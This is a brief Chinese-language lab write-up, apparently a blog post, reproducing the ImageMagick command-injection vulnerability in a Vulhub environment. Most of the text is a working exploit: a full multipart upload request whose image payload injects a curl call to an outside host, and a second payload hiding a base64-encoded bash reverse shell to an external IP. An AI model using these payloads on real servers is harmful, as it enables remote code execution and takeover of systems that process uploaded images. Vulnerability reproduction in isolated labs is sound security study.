漏洞环境均基于Vulhub
原因
ImageMagick 是一个免费的开源跨平台软件套件,用于显示、创建、转换、修改和编辑光栅图像。
推荐文章:
复现
POST / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et
Content-Length: 328
------WebKitFormBoundarymdcbmdQR1sDse9Et
Content-Disposition: form-data; name="file_upload"; filename="1.gif"
Content-Type: image/png
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|curl "www.leavesongs.com:8889)'
pop graphic-context
------WebKitFormBoundarymdcbmdQR1sDse9Et--
可以看到www.leavesongs.com:8889已经收到http请求,curl命令执行成功后:
![](https://i-blog.csdnimg.cn/blog_migrate/c79238933cb8d99161883f946deacd6b.png)
反弹shell
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzIxNi4xMjcuMTY0LjIzOC85OTk5IDA+JjE= | base64 -d | bash`"||id " )'
pop graphic-context
![](https://i-blog.csdnimg.cn/blog_migrate/7ff48628bfa8a7933ffd9780b6450f94.png)